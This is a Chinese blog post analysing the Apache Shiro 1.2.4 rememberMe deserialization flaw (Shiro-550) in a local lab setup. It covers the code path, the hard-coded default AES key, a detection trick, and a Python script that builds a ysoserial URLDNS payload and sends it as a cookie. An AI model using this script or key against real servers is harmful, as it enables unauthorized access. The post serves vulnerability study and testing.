vlambda博客
学习文章列表

Apache  Shiro < 1.2.5

Apache Shiro是一个功能强大、灵活的，开源的安全框架。它可以干净利落地处理身份验证、授权、企业会话管理和加密。

Shiro 针对 Shiro 开发团队所说的“应用程序安全的四个基石”——身份验证、授权、会话管理和密码学：

• 身份验证：有时称为“登录”，这是证明用户是他们所说的人的行为。

• 授权：访问控制的过程，即确定“谁”可以访问“什么”。

• 会话管理：管理特定于用户的会话，即使在非 Web 或 EJB 应用程序中也是如此。

• 密码学：使用密码算法保持数据安全，同时仍然易于使用。

下载shiro1.2.4

https://github.com/apache/shiro/tree/shiro-root-1.2.4

然后直接使用IDEA打开samples下的web项目，然后配置好Tomcat

环境搭建成功

shrio的框架包包含Shiro-core与Shiro-web，在调试的时候两个包都会用

在框架中存在反序列化方法，并且存在方法调用了该反序列化方法，向上寻找入口点

找到resolvePrincipals方法，看翻译可以知道这个方法的作用是检验rememberMe的身份，结合上面反序列化方法存在的类（AbstractRememberMeManager）就大概可以猜测到之前的反序列化应该就是对rememberMe的反序列化，一个用户登录成功后会返回一个rememberMe值，可以通过这个值去校验用户

查看RemeberMe的来源，使用burp登录，校验成功后会返回rememberMe的值

登录成功后再次发包Cookie中就会自带rememberMe的值，并且返回包也没有跳转到login.jsp，表示通过了身份验证

接下来使用带rememberMe值的请求包进行正向调试，调试到getRememberedSerializedIdentity方法，只要rememberMe不是deleteMe那么就会对rememberMe进行base64解码并返回

会对解码后的字符进行再次解密，解密之后就会进行反序列化操作了

查看decrypt，可以看到是AES解密，AES是一种对称解密，而框架中是存在默认的密钥的，密钥是对一组特定base64值解密得到的

解密完成之后就会顺利地进行反序列化了，因为rememberMe是从Cookie中得到的，而Cookie又是可控的，因此在开发者没有改AES密钥的情况下，这个反序列化点是可控的，满足反序列化的基本条件

总结一下触发反序列化的基本流程：

Cookie中的RememberMe --> Base64解密 --> 使用AES密钥解密（密钥存在硬编码） --> 进行反序列化

shiro-550的检测：

可以使用BurpSuite进行抓包，在请求包中的cookie字段中添加rememberMe=123;，看响应包header中是否返回rememberMe=deleteMe值，若有，则证明该系统使用了Shiro框架

结合ysoserial使用URLDNS链简单利用：

1、在本地启动shiro1.2.4

2、下载ysoserial，然后使用脚本进行利用

#!/usr/bin/env python3# coding:utf-8
import sysimport uuidimport base64import subprocessfrom Crypto.Cipher import AESimport requestsdef encode_rememberme(command): popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar','URLDNS', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==") iv = uuid.uuid4().bytes encryptor = AES.new(key, AES.MODE_CBC, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext
if __name__ == '__main__': url = sys.argv[1] command = sys.argv[2] payload = encode_rememberme(command) cookie = "rememberMe={0}".format(payload.decode())
 headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:98.0) Gecko/20100101 Firefox/98.0", "Cookie": "{0}".format(cookie) }
 requests.get(url=url, headers=headers)

参考文档：

• https://github.com/frohoff/ysoserial

• https://shiro.apache.org/